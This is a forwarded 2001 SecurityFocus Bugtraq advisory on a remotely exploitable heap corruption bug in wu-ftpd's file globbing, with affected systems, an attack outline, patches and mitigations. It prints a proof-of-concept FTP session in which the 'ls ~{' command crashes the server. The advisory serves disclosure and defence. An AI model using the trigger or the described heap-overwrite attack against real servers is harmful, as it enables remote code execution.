heh, fun.

-- 
Nate Carlson <natecars at real-time.com>   | Phone : (952)943-8700
http://www.real-time.com                | Fax   : (952)943-8500


---------- Forwarded message ----------
Date: Wed, 28 Nov 2001 10:05:28 -0700 (MST)
From: Dave Ahmad <da at securityfocus.com>
To: "bugtraq at securityfocus.com" <bugtraq at securityfocus.com>
Subject: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption
    Vulnerability


---------------------------------------------------------------------------
                              Security Alert

Subject:      Wu-Ftpd File Globbing Heap Corruption Vulnerability
BUGTRAQ ID:   3581                   CVE ID:         CVE-MAP-NOMATCH
Published:    Nov 27, 2001           Updated:        Nov 28, 2001 01:12:56

Remote:       Yes                    Local:          No
Availability: Always                 Authentication: Not Required
Credibility:  Vendor Confirmed       Ease:           No Exploit Available
Class:        Failure to Handle Exceptional Conditions

Impact:   10.0           Severity: 10.0            Urgency:  8.2

Last Change:  Initial analysis.
---------------------------------------------------------------------------

Vulnerable Systems:

  Washington University wu-ftpd 2.6.1
   + Caldera OpenLinux Server 3.1
   + Caldera OpenLinux Workstation 3.1
   + Cobalt Qube 1.0
   + Conectiva Linux 7.0
   + Conectiva Linux 6.0
   + MandrakeSoft Corporate Server 1.0.1
   + MandrakeSoft Linux Mandrake 8.1
   + MandrakeSoft Linux Mandrake 8.0 ppc
   + MandrakeSoft Linux Mandrake 8.0
   + MandrakeSoft Linux Mandrake 7.2
   + MandrakeSoft Linux Mandrake 7.1
   + MandrakeSoft Linux Mandrake 7.0
   + MandrakeSoft Linux Mandrake 6.1
   + MandrakeSoft Linux Mandrake 6.0
   + RedHat Linux 7.2 noarch
   + RedHat Linux 7.2 ia64
   + RedHat Linux 7.2 i686
   + RedHat Linux 7.2 i586
   + RedHat Linux 7.2 i386
   + RedHat Linux 7.2 athlon
   + RedHat Linux 7.2 alpha
   + RedHat Linux 7.1 noarch
   + RedHat Linux 7.1 ia64
   + RedHat Linux 7.1 i686
   + RedHat Linux 7.1 i586
   + RedHat Linux 7.1 i386
   + RedHat Linux 7.1 alpha
   + RedHat Linux 7.0 sparc
   + RedHat Linux 7.0 i386
   + RedHat Linux 7.0 alpha
   + TurboLinux TL Workstation 6.1
   + TurboLinux Turbo Linux 6.0.5
   + TurboLinux Turbo Linux 6.0.4
   + TurboLinux Turbo Linux 6.0.3
   + TurboLinux Turbo Linux 6.0.2
   + TurboLinux Turbo Linux 6.0.1
   + TurboLinux Turbo Linux 6.0
   + Wirex Immunix OS 7.0-Beta
   + Wirex Immunix OS 7.0
  Washington University wu-ftpd 2.6.0
   + Cobalt Qube 1.0
   + Conectiva Linux 5.1
   + Conectiva Linux 5.0
   + Conectiva Linux 4.2
   + Conectiva Linux 4.1
   + Conectiva Linux 4.0es
   + Conectiva Linux 4.0
   + Debian Linux 2.2 sparc
   + Debian Linux 2.2 powerpc
   + Debian Linux 2.2 arm
   + Debian Linux 2.2 alpha
   + Debian Linux 2.2 68k
   + Debian Linux 2.2
   + RedHat Linux 6.2 sparc
   + RedHat Linux 6.2 i386
   + RedHat Linux 6.2 alpha
   + RedHat Linux 6.1 sparc
   + RedHat Linux 6.1 i386
   + RedHat Linux 6.1 alpha
   + RedHat Linux 6.0 sparc
   + RedHat Linux 6.0 i386
   + RedHat Linux 6.0 alpha
   + RedHat Linux 5.2 sparc
   + RedHat Linux 5.2 i386
   + RedHat Linux 5.2 alpha
   + S.u.S.E. Linux 6.4ppc
   + S.u.S.E. Linux 6.4alpha
   + S.u.S.E. Linux 6.4
   + S.u.S.E. Linux 6.3 ppc
   + S.u.S.E. Linux 6.3 alpha
   + S.u.S.E. Linux 6.3
   + S.u.S.E. Linux 6.2
   + S.u.S.E. Linux 6.1 alpha
   + S.u.S.E. Linux 6.1
   + TurboLinux Turbo Linux 4.0
   + Wirex Immunix OS 6.2
  Washington University wu-ftpd 2.5.0
   + Caldera eDesktop 2.4
   + Caldera eServer 2.3.1
   + Caldera eServer 2.3
   + Caldera OpenLinux 2.4
   + Caldera OpenLinux Desktop 2.3
   + RedHat Linux 6.0 sparc
   + RedHat Linux 6.0 i386
   + RedHat Linux 6.0 alpha


Summary:

  Wu-Ftpd contains a remotely exploitable heap corruption bug.

Impact:

  A remote attacker may execute arbitrary code on the vulnerable server.

Technical Description:

  Wu-Ftpd is an ftp server based on the BSD ftpd that is maintained  by
  Washington University.

  Wu-Ftpd allows for clients to organize files for ftp actions  based  on
  "file globbing" patterns.  File globbing is also used by various
  shells.  The implementation of file globbing included in Wu-Ftpd
  contains a heap corruption vulnerability that may allow for an attacker
  to execute arbitrary code on a server remotely.

  During the processing of a globbing pattern, the Wu-Ftpd implementation
  creates a list of the files that match.  The memory where this data is
  stored is on the heap, allocated using malloc().  The globbing function
  simply returns a pointer to the list.   It is up to the calling
  functions to free the allocated memory.

  If an error occurs processing the pattern, memory will not be allocated
  and a variable indicating this should be set.  The calling functions
  must check the value of this variable before attempting to use the
  globbed filenames (and later freeing the memory).

  When certain globbing patterns are processed, the globbing function does
  not set this variable when an error occurs.  As a result of this,
  Wu-Ftpd may eventually attempt to free uninitialized memory.  There are
  a number of possibly exploitable conditions.

  If this region of memory contained user-controllable data before the
  free call, it may be possible to have an arbitrary word in memory
  overwritten with an arbitrary value.  This can lead to execution of
  arbitrary code if function pointers or return addresses are
  overwritten.

  If anonymous FTP is not enabled, valid user credentials are required to
  exploit this vulnerability.

  This vulnerability was initially scheduled for public release on
  December 3, 2001.  However, Red Hat has made details public as of
  November 27, 2001.  As a result, we are forced to warn other users of
  the vulnerable product, so that they may take appropriate actions.

Attack Scenarios:

  To exploit this vulnerability,  an  attacker  must  have  either  valid
  credentials required to log in as an FTP user, or anonymous access must
  be enabled.

  The attacker must ensure that a maliciously constructed  malloc  header
  containing the target address and it's replacement  value  are  in  the
  right location in the uninitialized part of  the  heap.   The  attacker
  must also place shellcode in server process memory.

  The attacker must send an FTP command containing  a  specific  globbing
  pattern that does not set the error variable.

  When the server attempts to free the memory used to store  the  globbed
  filenames, the target word in memory will be overwritten.

  If an attacker overwrites a function pointer or return address  with  a
  pointer to the shellcode, it may be executed by the server process.

Exploits:

  The following (from the CORE advisory) demonstrates  the  existence  of
  this vulnerability:

    ftp> open localhost
    Connected to localhost (127.0.0.1).
    220 sasha FTP server (Version wu-2.6.1-18) ready.
    Name (localhost:root): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ~{
    227 Entering Passive Mode (127,0,0,1,241,205)
    421 Service not available, remote server has closed connection

    1405 ?        S      0:00 ftpd: accepting connections on port 21
    7611 tty3     S      1:29 gdb /usr/sbin/wu.ftpd
    26256          ?                 S               0:00           ftpd:
  sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    26265 tty3     R      0:00 bash -c ps ax | grep ftpd
    (gdb) at 26256
    Attaching to program: /usr/sbin/wu.ftpd, process 26256
     Symbols already loaded for /lib/libcrypt.so.1
    Symbols already loaded for /lib/libnsl.so.1
    Symbols already loaded for /lib/libresolv.so.2
    Symbols already loaded for /lib/libpam.so.0
    Symbols already loaded for /lib/libdl.so.2
    Symbols already loaded for /lib/i686/libc.so.6
    Symbols already loaded for /lib/ld-linux.so.2
    Symbols already loaded for /lib/libnss_files.so.2
    Symbols already loaded for /lib/libnss_nisplus.so.2
    Symbols already loaded for /lib/libnss_nis.so.2
    0x40165544 in __libc_read () from /lib/i686/libc.so.6
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    __libc_free (mem=0x61616161) at malloc.c:3136
    3136    in malloc.c

  Currently the SecurityFocus staff are not aware of any exploits for
  this issue. If you feel we are in error or are aware of more recent
  information,  please mail us at: vuldb at securityfocus.com
  <mailto:vuldb at securityfocus.com>

Mitigating Strategies:

  This vulnerability is remotely exploitable.  Restricting access to the
  network port, (TCP port 21 is standard for  FTP), will block clients
  from unauthorized networks.

  With some operating systems, anonymous FTP is enabled by default.
  Anonymous FTP is often in use on public FTP sites, most often software
  repositories.  It is basically a guest account with access to download
  files from within a restricted environment.  This vulnerability is
  exploitable by clients logged in through anonymous FTP.  Anonymous FTP
  should be disabled immediately until fixes are available, as it would
  allow any host on the Internet who can connect to the service to
  exploit this vulnerability.  It is a good idea to disable it normally
  unless it is absolutely necessary (in which case the FTP server should
  be on a dedicated, isolated host).

  Stack   and   other   memory   protection   schemes   may    complicate
  exploitability,  and/or  prevent  commonly  available   exploits   from
  working.   This  should  not  be  relied  upon  for   security.    This
  vulnerability involves 'poking' words in memory.  This means that there
  are many different ways that it may be  exploited.   Making  the  stack
  non-executable or checking the integrity of stack variables may not  be
  enough to prevent all possibile methods of exploitation.

  It is advised to disable the service and use alternatives  until  fixes
  are available.

Solutions:

  Vendor notified on Nov 14, 2001.

  Fixes will be available from the author as well as from vendors who
  ship products that include Wu-Ftpd as core or optional components.

  This vulnerability was initially scheduled for public release on
  December 3, 2001.  Red Hat pre-emptively released an advisory on
  November 27, 2001.  As a result, other vendors may not yet have fixes
  available.

  This record will be updated as fixes from various vendors become
  available.

  For Washington University wu-ftpd 2.6.1:

    Red Hat RPM 6.2 alpha wu-ftpd-2.6.1-0.6x.21.alpha.rpm
    ftp://updates.redhat.com/6.2/en/os/alpha/wu-ftpd-2.6.1-0.6x.21.alpha.rpm

    Red Hat RPM 6.2 sparc wu-ftpd-2.6.1-0.6x.21.sparc.rpm
    ftp://updates.redhat.com/6.2/en/os/sparc/wu-ftpd-2.6.1-0.6x.21.sparc.rpm

    Red Hat RPM 7.0 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm
    ftp://updates.redhat.com/7.0/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm

    Red Hat RPM 7.0 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm
    ftp://updates.redhat.com/7.0/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm

    Red Hat RPM 7.1 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm
    ftp://updates.redhat.com/7.1/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm

    Red Hat RPM 7.1 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm
    ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm

    Red Hat RPM 7.1 ia64 wu-ftpd-2.6.1-16.7x.1.ia64.rpm
    ftp://updates.redhat.com/7.1/en/os/ia64/wu-ftpd-2.6.1-16.7x.1.ia64.rpm

    Red Hat RPM 7.2 i386 wu-ftpd-2.6.1-20.i386.rpm
    ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.1-20.i386.rpm

    Red Hat RPM 6.2 i386 wu-ftpd-2.6.1-0.6x.21.i386.rpm
    ftp://updates.redhat.com/6.2/en/os/i386/wu-ftpd-2.6.1-0.6x.21.i386.rpm

Credit:

  Condition first reported by Matt Power, deemed non-exploitable.
  Rediscovered and exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core
  Security Technologies, Buenos Aires, Argentina.

References:

  advisory:
  RedHat RHSA-2001:157-06: Updated wu-ftpd packages are available
  http://www.securityfocus.com/advisories/3680

  web page:
  CORE SDI Homepage (CORE)
  http://www.core-sdi.com

  web page:
  Wu-Ftpd Homepage (Washington University)
  http://www.wu-ftpd.org

ChangeLog:

  Nov 26, 2001: Initial analysis.

---------------------------------------------------------------------------

HOW TO INTERPRET THIS ALERT

            BUGTRAQ ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by SecurityFocus.com.

                CVE ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by the CVE.

             Published: The date the vulnerability was first made public.

               Updated: The date the information was last updated.

                Remote: Whether   this   is    a    remotely    exploitable
                        vulnerability.

                 Local: Whether   this    is    a    locally    exploitable
                        vulnerability.

           Credibility: Describes how credible the  information  about  the
                        vulnerability is. Possible values are:

                        Conflicting Reports: The are  multiple  conflicting
                        about the existance of the vulnerability.

                        Single  Source:  There  is  a  single  non-reliable
                        source   reporting    the    existence    of    the
                        vulnerability.

                        Reliable Source: There is a single reliable  source
                        reporting the existence of the vulnerability.

                        Conflicting Details:  There  is  consensus  on  the
                        existence  of  the  vulnerability  but   not   it's
                        details.

                        Multiple  Sources:  There  is  consensus   on   the
                        existence and details of the vulnerability.

                        Vendor Confirmed:  The  vendor  has  confirmed  the
                        vulnerability.

                 Class: The class of vulnerability.  Possible  values  are:
                        Boundary Condition Error, Access Validation  Error,
                        Origin Validation Error,  Input  Valiadtion  Error,
                        Failure  to  Handle  Exceptional  Conditions,  Race
                        Condition  Error,  Serialization  Error,  Atomicity
                        Error, Environment Error, and Configuration Error.

                  Ease: Rates  how  easiliy  the   vulnerability   can   be
                        exploited.  Possible   values   are:   No   Exploit
                        Available,  Exploit  Available,  and   No   Exploit
                        Required.

                Impact: Rates the impact of the vulnerability.  It's  range
                        is 1 through 10.

              Severity: Rates the severity of the vulnerability. It's range
                        is 1 through 10.  It's  computed  from  the  impact
                        rating and remote flag. Remote vulnerabiliteis with
                        a  high  impact  rating  receive  a  high  severity
                        rating. Local vulnerabilities  with  a  low  impact
                        rating receive a low severity rating.

               Urgency: Rates how quickly you should take action to fix  or
                        mitigate the vulnerability. It's range is 1 through
                        10. It's computed from  the  severity  rating,  the
                        ease  rating,  and  the  credibility  rating.  High
                        severity vulnerabilities with a high  ease  rating,
                        and a high confidence rating have a higher  urgency
                        rating. Low severity  vulnerabilities  with  a  low
                        ease rating, and a low  confidence  rating  have  a
                        lower urgency rating.

           Last Change: The  last  change   made   to   the   vulnerability
                        information.

    Vulnerable Systems: The list of vulnerable systems. A '+'  preceding  a
                        system  name  indicates  that  one  of  the  system
                        components is vulnerable vulnerable.  For  example,
                        Windows 98 ships with Internet Explorer.  So  if  a
                        vulnerability is found in IE you may see  something
                        like:  Microsoft  Internet  Explorer  +   Microsoft
                        Windows 98

Non-Vulnerable Systems: The list of non-vulnerable systems.

               Summary: A concise summary of the vulnerability.

                Impact: The impact of the vulnerability.

 Technical Description: The in-depth description of the vulnerability.

      Attack Scenarios: Ways an attacker may make use of the vulnerability.

              Exploits: Exploit intructions or programs.

 Mitigating Strategies: Ways to mitigate the vulnerability.

             Solutions: Solutions to the vulnerability.

                Credit: Information about who disclosed the vulnerability.

            References: Sources of information on the vulnerability.

     Related Resources: Resources that might be of additional value.

             ChangeLog: History of changes to the vulnerability record.

---------------------------------------------------------------------------

                     Copyright 2001 SecurityFocus.com





  ----------
SecurityFocus - the leading provider of Security Intelligence Services for
business.
Visit our website at www.securityfocus.com